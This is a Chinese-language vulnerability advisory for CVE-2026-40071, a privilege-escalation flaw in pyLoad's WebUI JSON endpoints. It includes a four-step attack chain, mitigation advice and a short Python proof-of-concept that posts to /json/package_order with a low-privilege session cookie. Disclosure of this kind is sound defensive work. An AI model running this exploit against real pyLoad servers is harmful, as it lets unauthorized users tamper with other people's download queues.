CVE-2026-40071 CVSS 5.4 中危

CVE-2026-40071 pyLoad权限提升漏洞

披露日期: 2026-04-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-40071

漏洞类型

权限提升

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

pyLoad

漏洞概述

pyLoad是一款开源下载管理器。在0.5.0b3.dev97版本之前，其WebUI的特定JSON端点（如/json/package_order）的权限验证机制存在缺陷。这些端点实施的权限检查比底层调用的核心API方法更为宽松。因此，经过身份验证的低权限用户能够绕过原有的权限模型限制，非法执行本应仅限高权限用户进行的修改操作，导致安全风险。

技术细节

该漏洞源于pyLoad WebUI接口与核心API之间的权限验证不一致。具体而言，/json/package_order、/json/link_order和/json/abort_link这三个端点在处理请求时，未严格调用核心API的权限校验逻辑。攻击者只需拥有低权限账户（如普通用户），即可通过网络向这些端点发送特制的HTTP请求。由于端点层面的权限控制较弱，请求被传递给核心API并执行修改操作（如更改包顺序或中止链接），从而绕过了pyLoad原本设计用于限制低权限用户修改数据的访问控制模型。

攻击链分析

STEP 1

1. 信息收集

攻击者识别出目标网络上运行着pyLoad下载管理器，并确认其版本低于0.5.0b3.dev97。

STEP 2

2. 获取低权限凭证

攻击者注册一个新的低权限账户，或通过其他手段获取一个已认证的低权限用户会话令牌。

STEP 3

3. 发送恶意请求

攻击者使用低权限账户的凭证，向/json/package_order等易受攻击的端点发送精心构造的POST请求。

STEP 4

4. 执行未授权操作

由于校验绕过，服务器核心API执行了请求，低权限用户成功修改了下载队列顺序或中止了下载任务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target = "http://127.0.0.1:8000"
endpoint = "/json/package_order"
url = target + endpoint

# Attacker's session (Low privilege user)
# Replace with a valid session cookie obtained after login
session_cookie = "pyload_session_id_here"

headers = {
    "Content-Type": "application/json",
    "Cookie": f"pyload_session={session_cookie}"
}

# Payload to modify package order
# This operation should require admin rights but is vulnerable
payload = {
    "pid": 1,
    "order": 0
}

try:
    response = requests.post(url, json=payload, headers=headers)
    if response.status_code == 200:
        print("[+] Vulnerability exploited successfully!")
        print(f"[+] Response: {response.text}")
    else:
        print(f"[-] Exploit failed. Status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

pyLoad < 0.5.0b3.dev97

防御指南

临时缓解措施

在未升级版本前，建议暂时禁止新用户注册，并严格限制对pyLoad WebUI的网络访问，仅允许可信IP段连接。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表